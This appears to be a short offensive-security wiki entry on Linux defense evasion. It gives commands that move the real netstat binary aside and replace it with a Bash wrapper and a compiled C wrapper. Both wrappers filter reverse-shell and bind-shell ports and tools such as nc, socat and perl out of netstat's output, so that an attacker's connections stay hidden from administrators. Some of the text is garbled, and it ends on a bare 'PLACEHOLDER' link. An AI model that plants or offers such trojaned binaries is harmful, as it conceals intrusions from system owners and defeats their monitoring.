Secondary Categories: 02-Defense Evasion
There are a lot of different methods on Linux to view connections we can simply hide these by using one of two methods:
Both of these methods rely on original binary still on the system so what we can do is move the file and change it to another name. Then placing out new binary or script in a path before the original file.
#We are moving the orginal
mv /bin/netstat /usr/sbin/ns.bak
Bash;
In this case we just the $@
in this ensure that any parameters passed by the user is also passed through.
#!/bin/bash
/usr/sbin/ns.bak \$@ | grep -Ev '4444|3177|1177|1337|19526|socat|LEGO|nc|perl'
C
In the example below we can use the following code grep
to filter out any common ports we use for bind shells or reverse shells
int main(int a,char**b){
char*c[999999]={"sh","-c","/usr/sbin/ns.bak \$*|grep -Ev '4444|3177|1177|1337|19526|socat|LEGO|nc|perl'"};
memcpy(c+3,b,8*a);
execv("/bin/sh",c);
}
Compiling the binary:
gcc -xc /tmp/.netstat.c -o /usr/bin/netstat
Also Check Out:
- PLACEHOLDER